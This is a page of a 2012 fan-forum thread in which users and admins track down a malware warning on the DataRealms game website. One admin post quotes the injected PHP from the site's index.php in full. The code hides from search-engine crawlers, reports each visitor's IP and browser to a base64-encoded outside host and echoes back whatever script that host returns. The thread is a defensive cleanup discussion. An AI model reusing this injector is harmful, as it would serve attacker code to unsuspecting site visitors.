Data Realms Fan Forums - View topic - DataRealms Website Malware Warning

Page 2 of 3

[ 37 posts ]

Go to page Previous 1, 2, 3 Next

DataRealms Website Malware Warning

Author	Message
Dauss A HUMAN BRAIN, SAFELY INSULATED FROM THE TERRORS OF HYPERSPACE Joined: Sun Jan 28, 2007 8:54 pm Posts: 1070 Location: Somewhere beyond the endless sea of hyperspace, fighting for your right to call a planet home.	Re: DataRealms Website Malware Warning Well, this isn't any good is it.
Mon Jun 11, 2012 4:01 pm

TheLastBanana DRL Developer Joined: Wed Dec 13, 2006 5:27 am Posts: 3138 Location: A little south and a lot west of Moscow	Re: DataRealms Website Malware Warning As you guys can probably imagine, Data is trying to get these problems (as well as some potentially related server issues) dealt with as soon as possible. It's getting a little difficult, though, since he's also trying to work on the next version of CC at the same time. If anybody is willing to give him a hand, or knows anybody who might, send me (or him) a PM.
Wed Jun 13, 2012 2:28 am

NikolaiLev Joined: Fri Aug 26, 2011 3:06 am Posts: 42	Re: DataRealms Website Malware Warning Wish I could help, all I can do is point out problems though. The warning is gone right now, that said.
Wed Jun 13, 2012 2:48 am

NikolaiLev Joined: Fri Aug 26, 2011 3:06 am Posts: 42	Re: DataRealms Website Malware Warning Uh oh. The warning is back again.
Thu Jun 21, 2012 10:37 am

findude Joined: Tue Dec 12, 2006 3:10 pm Posts: 495 Location: Uncertain quantum state	Re: DataRealms Website Malware Warning http://pastebin.com/Y9rTWnzJ Oh hi there. This is the presumably foreign piece of script on the site that I managed to catch. It was in a hidden iframe, with a src of "http://ovalslassostyle.net/111" scriptsrc being "/xSE_dFpCn/xjUVworW?cvgqzt=OL.k_kgz8zX5kO" Funny obfuscation. It creates strings "eval", "substring", "fromCharCode", "indexOf" and "CharAt" with the variables, and calls them as functions. I think the starting ifs break the script after it executes, removing it. http://pastebin.com/QuWRS4Hd Here's my best-guess unobfuscation and cleanup. The script then takes a substring and eval's the decrypted code. http://pastebin.com/MLY8i1kG Ie. exactly what Daman said.
Sun Jun 24, 2012 1:21 pm

NikolaiLev Joined: Fri Aug 26, 2011 3:06 am Posts: 42	Re: DataRealms Website Malware Warning Once again, the warning is gone, for now. Hopefully, for good.
Sun Jun 24, 2012 6:01 pm

scancode The Licensing Guy Joined: Sun Aug 24, 2008 2:00 am Posts: 64 Location: Buenos Aires, Argentina.	Re: DataRealms Website Malware Warning If you ever see something like this again, please give me the URL on the datarealms site where the warning appears, and (if possible) the offending code. Site seems clean now.
Sun Jun 24, 2012 8:38 pm

findude Joined: Tue Dec 12, 2006 3:10 pm Posts: 495 Location: Uncertain quantum state	Re: DataRealms Website Malware Warning As already said, it seems to be happening once per ip or something. The offsite code (called by the obfuscated script) likely hides the script from you once it executes. Or maybe it uses cookies. I caught it with NoScript: it pops a nice big block icon where the invisible iframe resides. Will check the GET console of Firefox the next time it happens, in hopes of getting a look at the offsite code. I doubt that's how it works, but eh.
Sun Jun 24, 2012 8:45 pm

scancode The Licensing Guy Joined: Sun Aug 24, 2008 2:00 am Posts: 64 Location: Buenos Aires, Argentina.	Re: DataRealms Website Malware Warning Thanks for the info, findude. Seems we had this stuck in index.php Code: <?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> So it was getting the evil code from an external site. Time to audit security it seems!
Sun Jun 24, 2012 10:11 pm

Glowsticks Joined: Sat Jul 10, 2010 5:19 pm Posts: 543	Re: DataRealms Website Malware Warning So, does this mean DRL users are now part of a botnet, or did I read the last two pages incorrectly?
Sun Jun 24, 2012 11:58 pm

TheLastBanana DRL Developer Joined: Wed Dec 13, 2006 5:27 am Posts: 3138 Location: A little south and a lot west of Moscow	Re: DataRealms Website Malware Warning I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.
Mon Jun 25, 2012 5:17 am

NikolaiLev Joined: Fri Aug 26, 2011 3:06 am Posts: 42	Re: DataRealms Website Malware Warning I always get this warning at the main site http://www.datarealms.com/ and I generally don't proceed after that. But I'll send the PM if it happens again.
Mon Jun 25, 2012 6:15 pm

scancode The Licensing Guy Joined: Sun Aug 24, 2008 2:00 am Posts: 64 Location: Buenos Aires, Argentina.	Re: DataRealms Website Malware Warning TheLastBanana wrote: I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay. The last little while being from May 20 onwards.
Tue Jun 26, 2012 7:07 pm

NikolaiLev Joined: Fri Aug 26, 2011 3:06 am Posts: 42	Re: DataRealms Website Malware Warning I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, one being Explorer\Advanced\|Start_ShowHelp and Explorer\Advanced\|Start_ShowSearch. I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.
Tue Jun 26, 2012 8:17 pm

scancode The Licensing Guy Joined: Sun Aug 24, 2008 2:00 am Posts: 64 Location: Buenos Aires, Argentina.	Re: DataRealms Website Malware Warning NikolaiLev wrote: I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, one being Explorer\Advanced\|Start_ShowHelp and Explorer\Advanced\|Start_ShowSearch. I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site. PUM = Potentially Unwanted Modifications -- Start_ShowHelp hides Start Menu/Help and Start_ShowSearch hides Start Menu/Search. Pretty simple (and benign) stuff.
Tue Jun 26, 2012 10:35 pm

Display posts from previous: Sort by

Page 2 of 3

[ 37 posts ]

Go to page Previous 1, 2, 3 Next

DataRealms Website Malware Warning

Who is online